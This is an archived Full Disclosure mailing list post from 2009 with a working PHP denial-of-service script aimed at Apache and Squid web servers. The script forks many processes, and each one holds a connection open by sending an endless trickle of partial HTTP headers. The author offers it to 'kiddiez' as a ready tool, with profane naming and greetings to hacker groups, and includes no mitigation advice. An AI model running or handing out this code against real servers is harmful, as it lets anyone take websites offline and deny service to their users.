Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

apache and squid dos
From: evilrabbi <evilrabbi () gmail com>
Date: Fri, 19 Jun 2009 11:00:05 -0700

Exploit for new apache and squid dos mentioned on sans..

<?php
/*
    DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601


    I wrote it in PHP because I find it funny to make PHP attack apache...
    I set it at 200 processes and it kill my test servers pretty quick. have
fun kiddiez...

    greetz: m1m1, t4dp0le, p00kiep0x, global hell [gH], b4b0, ri0t, JxT,
bastard labs, neonfreon and everyone else you know who you are.....
    --evilrabbi b4b0
*/
/**
 * Usage function...
 *
 * @param $argv array
 * @return void
 */
function usage($argv)
{
    print "Usage: php ./{$argv[0]} <number of processes> <webserver ip or
hostname>\n";
    die();
}

/**
 * Hangs the connection to the webserver
 *
 * @param $server string
 * @return void
 */
function killTheFucker($server)
{
    $request  = "GET / HTTP/1.1\r\n";
    $request .= "Host: {$server}\r\n";
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
    $request .= "Content-Length: " . rand(1, 1000) . "\r\n";
    $request .= "X-a: " . rand(1, 10000) . "\r\n";

    $sockfd = @fsockopen($server, 80, $errno, $errstr);
    @fwrite($sockfd, $request);

    while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE)
    {
        sleep(15);
    }


}

/**
 * main function
 * @param $argc int
 * @param $argv array
 * @return void
 */
function main($argc, $argv)
{
    $status = 1;

    if ($argc < 3)
    {
        usage($argv);
    }

    $pids = Array();

    for ($i = 0; $i < $argv[1]; $i++)
    {
        $pid = pcntl_fork();

        if ($pid == -1)
        {
            die("ERROR! () # YOU MADE BABY JESUS CRY");
        }
        else if ($pid == 0)
        {
            killTheFucker($argv[2]);
            exit(0);
        }
        else
        {
            $pids[] = $pid;
        }
    }

    foreach ($pids as $pid)
    {
        pcntl_waitpid($pid, $status);
    }
}

// fire everything up
main($argc, $argv);
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]